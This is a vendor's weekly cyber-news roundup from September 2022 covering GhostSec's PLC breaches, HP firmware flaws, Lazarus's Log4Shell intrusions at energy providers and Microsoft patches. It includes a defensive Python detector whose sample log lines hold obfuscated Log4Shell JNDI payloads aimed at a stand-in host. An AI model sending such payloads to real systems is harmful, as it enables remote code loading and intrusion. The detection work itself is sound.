This Week in Cyber 16 September 2022

This week's news & views from our Cyber Analysts

Written by Team Nucleus

Written on 15th September, 2022


Israeli Berghof PLCs compromised by Hacktivist Group GhostSec

Self-proclaimed vigilante group GhostSec has claimed responsibility for the compromise of 55 Berghof PLCs (programmable logic controllers) used by organisations in Israel as part of a “Free Palestine” campaign. The breach was investigated by cybersecurity firm OTORIO, who found that the PLCs were exposed to the public internet and were easily accessible because they were protected only by simple credentials.


GhostSec posted a video on its Instagram account on the 4th of September demonstrating a successful login to the PLCs' admin account, and followed this up by dumping data taken from the controllers. The breach of the PLCs indicates the group's shift towards SCADA (supervisory control and data acquisition) environments; it has more recently posted screenshots of a further breach into a SCADA network, showing access to a control panel that can be used to change the pH and chlorine levels in water.


Fortunately this attack had little impact on the affected organisations, but it was easily avoidable. It is vitally important to check that devices are not internet facing unless they need to be, and that all internet-facing devices are secured with complex passwords and encrypted data streams.


High Severity Vulnerabilities Discovered in HP Enterprise Devices

Several months after public disclosure, HP has not released patches for critical vulnerabilities in its high-end notebooks that would allow attackers to execute arbitrary code at the highest privilege level. These vulnerabilities all carry CVSS scores between 7.5 and 8.2 and include out-of-bounds writes, improper input validation and buffer overflows. They were first reported as far back as April 2022. Binarly, a firmware security organisation, first revealed the issues at the Black Hat conference in mid-August 2022 and said that the vulnerabilities cannot be detected by firmware integrity monitoring that relies on TPM (Trusted Platform Module) measurement. Firmware attacks can be particularly dangerous because the threat actor is able to establish long-term persistence that survives reboots, and such attacks can also evade OS-level protections.


Patching is imperative to keep systems secure, as threat actors can use unpatched systems as a gateway into private networks and critical systems.


Energy Providers Hacked by North Korean Threat Group Lazarus

It has recently been reported that the North Korean group Lazarus has been targeting energy providers around the world between February and July 2022. Symantec and AhnLab had disclosed some of this activity back in April and May, but Cisco Talos has since published further details and looked deeper into the attacks. Lazarus exploited the Log4j vulnerability ‘Log4Shell’ on unpatched VMware Horizon servers to gain initial access to the affected organisations, using a reverse shell to create their own user accounts. The tools used by the threat actor were identified by Cisco Talos as VSingle, a RAT (Remote Access Trojan) used to execute arbitrary code; Yamabot, malware used to connect to a command and control server; and MagicRAT, a RAT used to access the victim systems. The attacks aimed to establish long-term persistence and exfiltrate data from energy providers in several countries, including the US, Canada and Japan.
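
As an added defender-side example (not from the original post or from Cisco Talos), the following Python checks web-server log lines for the Log4Shell JNDI lookup pattern that the initial access above relied on, including URL-encoded and nested-lookup obfuscations. The log lines and their format are constructed for the example and are not real VMware Horizon logs.

```python
import re
from urllib.parse import unquote

# Constructed sample request-log lines (assumed format; not real Horizon logs).
SAMPLE_LOGS = [
    '10.0.0.5 - - [12/Mar/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2022:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [12/Mar/2022:10:01:09 +0000] "GET /portal/ HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://203.0.113.7:1389/b}"',
    '10.0.0.9 - - [12/Mar/2022:10:01:11 +0000] "GET /portal/?q=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.7%2Fc%7D HTTP/1.1" 200 "curl/7.68"',
    '10.0.0.9 - - [12/Mar/2022:10:01:13 +0000] "GET /portal/ HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.7/d}"',
]

# Nested lookups commonly used to hide the literal "jndi": ${lower:j}, ${upper:J}, ${::-j}
NESTED_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}$])\}|\$\{::-([^{}$]*)\}", re.IGNORECASE)
# The de-obfuscated lookup: ${jndi:<scheme>://<target>
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^}\s]+)", re.IGNORECASE)


def normalise(text: str) -> str:
    """URL-decode (twice, for double encoding) and collapse nested lookups until stable."""
    text = unquote(unquote(text))
    while True:
        new = NESTED_LOOKUP.sub(lambda m: m.group(1) or m.group(2) or "", text)
        if new == text:
            return text.lower()
        text = new


def find_jndi(lines):
    """Return (line_no, scheme, target) for every line containing a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = JNDI.search(normalise(line))
        if m:
            hits.append((n, m.group(1), m.group(2)))
    return hits


if __name__ == "__main__":
    for line_no, scheme, target in find_jndi(SAMPLE_LOGS):
        print(f"line {line_no}: JNDI lookup via {scheme} to {target}")
```

Real detection should also cover headers other than User-Agent and request bodies, since the lookup string fires wherever the vulnerable logger records attacker-controlled input.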


Microsoft Releases September 2022 Security Updates - 63 flaws fixed

Microsoft has released updates addressing a total of 63 vulnerabilities across its software, including one actively exploited Windows vulnerability. Five of the fixes are classified as 'Critical' because they enable remote code execution.


The actively exploited vulnerability is tracked as CVE-2022-37969, a Windows Common Log File System Driver Elevation of Privilege Vulnerability; Microsoft advises that an attacker who successfully exploited it could gain SYSTEM privileges. More information is detailed in the Microsoft release note: https://msrc.microsoft.com/update-guide/releaseNote/2022-Aug


Whilst patching can be time consuming and disruptive, it is an important element of keeping your company safe and secure from cyber attacks. As part of Telesoft's Managed Detection and Response service we provide continuous vulnerability assessment, rapid alerting and remediation advice, coupled with our Threat Hunting Service, to help protect organisations from the impact of critical vulnerabilities.

